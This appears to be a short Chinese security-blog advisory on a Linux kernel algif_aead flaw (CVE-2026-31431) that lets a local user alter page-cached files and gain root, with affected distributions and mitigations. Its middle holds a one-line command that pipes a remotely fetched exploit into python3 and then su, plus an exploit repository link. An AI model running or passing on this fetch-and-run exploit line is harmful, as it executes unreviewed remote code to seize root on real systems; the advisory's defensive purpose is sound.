点击蓝字,关注大白哥AI与安全,一起探索AI与网络安全 免责声明:本文技术、思路及工具仅用于合法安全测试与防御研究,严禁用于非法入侵、攻击他人系统、数据窃取等违法违规行为,一切后果由使用者自行承担,文章作者及公众号不担任何法律责任。如有侵权烦请告知,我们会立即删除并致歉。谢谢!
Linux 内核加密模块 algif_aead 存在一个内存写入漏洞。普通本地用户可利用该漏洞,精确修改任意可读文件在内存(page cache)中的 4 个字节,从而篡改如 setuid 这类系统程序的文件内容,最终实现本地提权到 root。 Linux 内核版本自 2017 年后引入的所有发行版均受影响:
CentOS 7/8/9RHEL 7/8/9Ubuntu 18.04–24.04Debian 10/11/12国产麒麟、统信等基于 Linux 的系统
curl https://copy.fail/exp | python3 && su
https://github.com/0xShe/CVE-2026-31431
1. 打补丁:更新内核到包含 a664bf3d603d 提交的版本。2. 临时措施:禁用 algif_aead 模块(对绝大多数系统没有可测量的影响,不影响 dm-crypt/LUKS、kTLS、SSH 等)3. 对于不可信工作负载,通过 seccomp 阻止 AF_ALG socket 创建。